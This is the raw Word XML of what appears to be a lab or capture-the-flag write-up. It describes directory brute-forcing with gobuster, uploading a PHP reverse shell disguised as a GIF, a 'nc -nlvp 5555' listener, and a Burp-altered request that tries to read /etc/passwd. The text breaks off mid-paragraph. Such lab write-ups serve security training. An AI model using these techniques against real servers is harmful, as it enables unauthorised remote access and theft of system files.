            <o:ink i="AHMdA8QBMgEQWM9UiuaXxU+PBvi60uGbIgMTSBRE//kDRawCRwFG2ARXCQAAAAUCC2QZGDIKgcf/&#10;/w+Ax///DzMKgcf//w+Ax///DwonCYdtTenAU8CxwAPJTcubL4eAQyhTmJwmBQYACgARIKA1LquV&#10;QN0B&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00921AB5" w:rsidRPr="00921AB5">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29A843FE" wp14:editId="7880B235">
            <wp:extent cx="4663942" cy="203200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731109" cy="2061268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.6  Authenticated Area and Uploader Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D099CD5" w14:textId="317D17BC" w:rsidR="00921AB5" w:rsidRDefault="0048628C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="160" w:line="269" w:lineRule="auto" w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048628C">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4909D409" wp14:editId="47A9A157">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-615123</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>501010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7465508" cy="470582"/>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7465508" cy="470582"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00135D26">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We’re in, but this is a mere clue, so we need to find the uploader tool . </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00135D26">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00135D26">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00135D26">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00135D26">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find any web directory named uploader tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59512B2F" w14:textId="270450E1" w:rsidR="00135D26" w:rsidRDefault="00135D26" w:rsidP="0087134C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9F8973" w14:textId="3DDADFDC" w:rsidR="0048628C" w:rsidRDefault="0048628C" w:rsidP="0087134C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CAD2E4" w14:textId="0FB9781A" w:rsidR="0048628C" w:rsidRDefault="0048628C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the common wordlist in kali we are looking for html, php filer uploader, obviously we need to provide the credentials and we came up with the result. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594130D9" w14:textId="72A893BC" w:rsidR="0048628C" w:rsidRDefault="0048628C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048628C">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38A39C3D" wp14:editId="290CFF3D">
            <wp:extent cx="5943600" cy="302069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020695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2163EE" w14:textId="699D629C" w:rsidR="0048628C" w:rsidRDefault="0048628C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The uploader page directory. </w:t>
      </w:r>
      <w:r w:rsidR="00B023E6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can look up in the browser and see where it leads us. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCE465" w14:textId="1632DBD9" w:rsidR="00B023E6" w:rsidRDefault="00B023E6" w:rsidP="0087134C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3828CF8D" w14:textId="0020F1DF" w:rsidR="00B023E6" w:rsidRDefault="0095344B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095344B">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E62D7A" wp14:editId="533DACF4">
            <wp:extent cx="5943600" cy="31178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117850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>2  Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.1  File Upload Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEBBAB4" w14:textId="2969636C" w:rsidR="0095344B" w:rsidRDefault="0095344B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We have a </w:t>
      </w:r>
      <w:r w:rsidRPr="0095344B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">tab available. </w:t>
      </w:r>
      <w:r w:rsidR="008B6610">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So we need to find the vulnerabilities of these file uploads. </w:t>
      </w:r>
      <w:r w:rsidR="00685BEB">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So we can get a malicious code injected into the upload files for that we need to modify a php reverse shell and hide it as a gif file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17DF7B" w14:textId="71817FE8" w:rsidR="00685BEB" w:rsidRDefault="00AF278B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So we copy the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>php.reverse_shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> files from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and modify it and add our own </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (kali) and change the port to 5555. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1014CDC9" w14:textId="7CACFBBA" w:rsidR="00AF278B" w:rsidRDefault="00AF278B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF278B">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E26D8F0" wp14:editId="5F8B4398">
            <wp:extent cx="5943600" cy="206184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061845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="134202CA" w14:textId="512C68E5" w:rsidR="00AF278B" w:rsidRDefault="00AF278B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So in order to upload we need to mimic this into a gif file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0F488" w14:textId="4B3F0090" w:rsidR="00AF278B" w:rsidRDefault="00AF278B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF278B">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62C69075" wp14:editId="7E638700">
            <wp:extent cx="4577640" cy="2965686"/>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612015" cy="2987956"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B056E00" w14:textId="3481179B" w:rsidR="00AF278B" w:rsidRDefault="00872278" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872278">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E354E78" wp14:editId="0F150582">
            <wp:extent cx="5943600" cy="89852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898525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609496B" w14:textId="40BDA1EF" w:rsidR="00872278" w:rsidRDefault="00872278" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Image uploaded successfully. </w:t>
      </w:r>
      <w:r w:rsidR="005F3C6D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">However we do not know where the file is uploaded. So we need to find out the directory where it is. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FA1ED2" w14:textId="36AA7170" w:rsidR="00EF745F" w:rsidRDefault="00EF745F" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So next we can set up the listener using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF745F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5555</w:t>
      </w:r>
      <w:r w:rsidR="00D40812">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Still we couldn’t find any directory. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.2  Request Manipulation and File Path Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9306DC" w14:textId="37B84DB0" w:rsidR="00D40812" w:rsidRDefault="00D40812" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So we turn on our proxy and launch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F01D0B">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Turn on proxy and intercept on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348932A1" w14:textId="530A82D5" w:rsidR="00F01D0B" w:rsidRDefault="00F01D0B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01D0B">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1657AEE5" wp14:editId="0256B280">
            <wp:extent cx="3669964" cy="268268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675568" cy="2686777"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A1745" w14:textId="29736C41" w:rsidR="00F01D0B" w:rsidRDefault="00287B4D" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Then refresh the API page&gt;send to repeater&gt; change value to post&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CC271" w14:textId="114DA453" w:rsidR="00287B4D" w:rsidRDefault="00287B4D" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287B4D">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23042466" wp14:editId="462840E0">
            <wp:extent cx="5943600" cy="191262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1912620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5BA8C" w14:textId="76F32BF4" w:rsidR="00287B4D" w:rsidRDefault="00287B4D" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="160" w:line="269" w:lineRule="auto" w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00287B4D">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7830EFCC" wp14:editId="483A2629">
            <wp:extent cx="2714719" cy="3626864"/>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723229" cy="3638233"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> then we change the body parameters to file and /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/passwd/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EA1B16" w14:textId="4A349359" w:rsidR="00287B4D" w:rsidRDefault="00287B4D" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">And then send. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05A628" w14:textId="2238980E" w:rsidR="00B10F0B" w:rsidRDefault="00B10F0B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B10F0B">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E8B3251" wp14:editId="0D160E8B">
            <wp:extent cx="5544324" cy="6039693"/>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544324" cy="6039693"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="702E1558" w14:textId="6AD6266B" w:rsidR="00B10F0B" w:rsidRDefault="00B10F0B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">However we don’t have much vulnerability here to exploit or access any files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348CB941" w14:textId="7EE2F082" w:rsidR="00B10F0B" w:rsidRDefault="003E1AF5" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
